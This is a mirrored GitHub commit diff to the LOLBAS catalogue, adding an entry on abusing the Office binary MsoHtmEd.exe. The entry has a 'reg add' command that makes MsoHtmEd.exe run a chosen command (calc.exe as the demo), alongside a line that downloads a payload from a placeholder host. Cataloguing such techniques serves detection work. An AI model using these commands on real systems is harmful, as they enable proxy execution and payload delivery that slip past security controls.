mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2025-02-26 20:13:42 +01:00
Update MsoHtmEd.yml
This commit is contained in:
parent
7e1d5162a9
commit
9dba4379d4
@ -4,6 +4,13 @@ Description: Microsoft Office component
|
|||||||
Author: Nir Chako
|
Author: Nir Chako
|
||||||
Created: 2022-07-24
|
Created: 2022-07-24
|
||||||
Commands:
|
Commands:
|
||||||
|
- Command: MsoHtmEd.exe https://any-valid-link-to-download-any-html-file-from.com
|
||||||
|
Description: Execute a command line from the registry
|
||||||
|
Usecase: Set this registry key with the desired commaned you want to trigger - reg add "HKCU\SOFTWARE\Microsoft\Shared\HTML\Default Editor\shell\edit\command" /f /t REG_SZ /d "calc.exe"
|
||||||
|
Category: Execute
|
||||||
|
Privileges: User
|
||||||
|
MitreID: T1218
|
||||||
|
OperatingSystem: Windows 10, Windows 11
|
||||||
- Command: MsoHtmEd.exe https://example.com/payload
|
- Command: MsoHtmEd.exe https://example.com/payload
|
||||||
Description: Downloads payload from remote server
|
Description: Downloads payload from remote server
|
||||||
Usecase: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)
|
Usecase: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)
|
||||||
|
Loading…
Reference in New Issue
Block a user